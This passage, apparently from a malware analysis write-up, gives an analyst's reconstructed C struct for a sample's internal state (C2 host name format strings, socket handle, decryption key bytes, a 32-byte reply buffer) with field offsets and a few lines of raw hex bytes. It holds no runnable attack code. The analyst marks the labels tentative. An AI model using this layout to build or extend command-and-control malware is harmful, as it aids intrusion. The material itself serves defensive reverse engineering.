 * demonstrate are the analyst's labels and should be treated as tentative.
 */
struct _my_struct
{
    char currentDateStr[12];   /* 0x000 */
    BYTE someData[11];         /* 0x00C */
    QWORD resourceBin;         /* 0x018 */
    DWORD resourceSize;        /* 0x020 */
    DWORD roundId;             /* 0x024 */
    char processName[261];     /* 0x028 */
    char formatStr[34];        /* 0x12D: first "%s" of "%s.%s" when building the C2 host name */
    BOOL isWow64;              /* 0x150 */
    DWORD connAttempts;        /* 0x154 */
    DWORD unknown0;            /* 0x158 */
    QWORD padding1[4];         /* 0x160 */
    DWORD wow64Flag;           /* 0x180 */
    char *hostAddr;            /* 0x188: second "%s" of the C2 host name */
    DWORD timeout;             /* 0x190 */
    DWORD unk;                 /* 0x194 */
    SOCKET mySocket;           /* 0x198: stored by communicate_over_socket on success */
    BYTE decryptedStr[32];     /* 0x1A0: input bytes 8..29 are mixed into the keys by decode_and_set_keys */
    BYTE bufReceived[32];      /* 0x1C0 (448): C2 reply buffer, 32-byte recv */
};                             /* sizeof == 0x1E0 (480) under the alignment assumed above */
C3 C1 A8 06 C2 96 33 00 00 00 00 00 00 00 00 00 8A 1D 89 15 14 9F C1 1D 99 7E 8A 1B 00 00 00 00 | |
E2 A4 B7 A7 D7 AC 87 8D 9B 9C 85 0D D8 8E E5 FA |